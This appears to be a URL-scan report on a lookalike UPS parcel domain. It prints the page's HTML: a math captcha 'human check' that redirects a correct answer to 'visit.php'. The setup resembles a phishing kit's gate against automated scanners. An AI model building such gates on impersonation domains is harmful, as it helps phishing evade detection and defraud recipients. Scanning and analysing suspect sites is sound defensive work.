https://myupps-pakkettt.com/ups/

ID de l'analyse :
fc7f3c49-a1b0-4c13-999e-a73e30755a18Terminée
URL soumise :
https://myupps-pakkettt.com/upsRedirigé
Fin du rapport :

Liens : 0 trouvé(s)

Variables JavaScript : 5 trouvée(s)

NomType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
generateCaptchafunction
verifyCaptchafunction

Messages de journal de console : 0 trouvé(s)

HTML

<!DOCTYPE html><html lang="en"><head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <!-- Font Google -->
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
        <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700;800&amp;display=swap" rel="stylesheet">
        <link rel="icon" type="image/png" href="https://cdn-icons-png.flaticon.com/512/4201/4201973.png">
        <link rel="stylesheet" href="./panel/css/captcha.css">
        <title>Verification</title>
    </head>
    <body>
        <div class="content">
            <div class="captcha-container">
                <div class="logo">
                    <img src="./panel/img/logo-captcha-calc.svg" alt="">
                </div>
                <p>
                    Please answer this simple math calculation to confirm that you are a human and not a robot.
                </p>
                <div class="captcha-text" id="captchaOperation">7 + 9 = ?</div>
                
                <div class="p-i-a-btn">
                    <input type="tel" id="captchaInput" class="captcha-input" placeholder="Enter the result">
                    <button class="verify-btn" onclick="verifyCaptcha()">Checking Result</button>
                </div>
                <div id="resultMessage" class="result"></div>
            </div>
        </div>
        <script>
            const captchaInput=document.getElementById("captchaInput");captchaInput.addEventListener("input",function(){this.value=this.value.replace(/[^0-9]/g,"")});let num1,num2;function generateCaptcha(){num1=Math.floor(10*Math.random())+1,num2=Math.floor(10*Math.random())+1,document.getElementById("captchaOperation").innerText=`${num1} + ${num2} = ?`,document.getElementById("captchaInput").value=""}function verifyCaptcha(){let e=parseInt(document.getElementById("captchaInput").value),t=document.getElementById("resultMessage");e===num1+num2?window.location.href="visit.php":(t.style.color="red",t.innerText="Incorrect, please try again.",generateCaptcha())}window.onload=generateCaptcha;
        </script>
    
    </body></html>